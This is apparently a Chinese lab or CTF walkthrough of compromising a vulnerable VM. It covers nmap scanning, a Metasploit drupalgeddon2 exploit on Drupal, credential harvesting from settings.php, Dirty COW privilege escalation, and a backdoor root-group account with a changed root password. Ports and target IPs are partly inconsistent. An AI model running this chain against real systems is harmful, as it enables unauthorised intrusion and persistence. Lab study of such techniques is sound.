一、镜像下载
3、VM 镜像文件打开
4、将虚拟机适配器设置为NAT模式
二、信息搜集
1、kali扫描靶机IP地址
arp-scan -l
2、nmap搜集该主机开放的端口
nmap -sS -T4 -P 1-65535 -v 192.168.245.129
80端口是一个静态页面。没有什么太多信息
3、端口碰撞 扫描出1098端口
nmap 192.168.245.129 -Pn -p 3
nmap - sS - sV -A -v -p- -T5 192.168.245.129
4、找到web服务
5、发现drupal,利用漏洞
通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal
# msf 搜索drupal漏洞,使用可利用漏洞进行攻击
>search drupal
# exploit/unix/webapp/drupal_drupalgeddon2
>use 1
>set rhosts 192.168.245.129
>set rport 1898
>run
问题:
6、继续信息搜集
kali扫描网站目录
dirb http://192.168.245.129:1898/
大量配置信息显示
1、测试网页进行弱口令爆破--失败
2、登陆框SQL注入---失败
3、xss跨站脚本攻击测试
4、 检查网页,发下下图两处能点击:
观察在node/3中有一个音频文件和一句话“Node 2 is not working”
先打开音频文件听一下,没有发现有用信息。
将node/3改为node/2试一下:
三、利用msfconsole工具攻击建立会话
python -c 'import pty; pty.spawn("/bin/bash")'
shell
四、提权
信息搜集
查找网站数据库的配置文件,在/var/www/html/sites/default/settings.php中找到了配置信息!!!
远程连接
ssh tiago@192.168.10.112
password:Virgulino
查看内核版本
uname -a
脏牛提权
searchsploit dirty
xp: GitHub - gbonacini/CVE-2016-5195: A CVE-2016-5195 exploit example.
将木马文件上传至服务器
进入文件目录 cd /tmp/CVE-2016-5195-master
make编译
./dcow -s1
后门:
创建用户
useradd Monster
将用户加入到管理组
usermod -g root Monster
修改root账户密码
passwd root
passwd Monster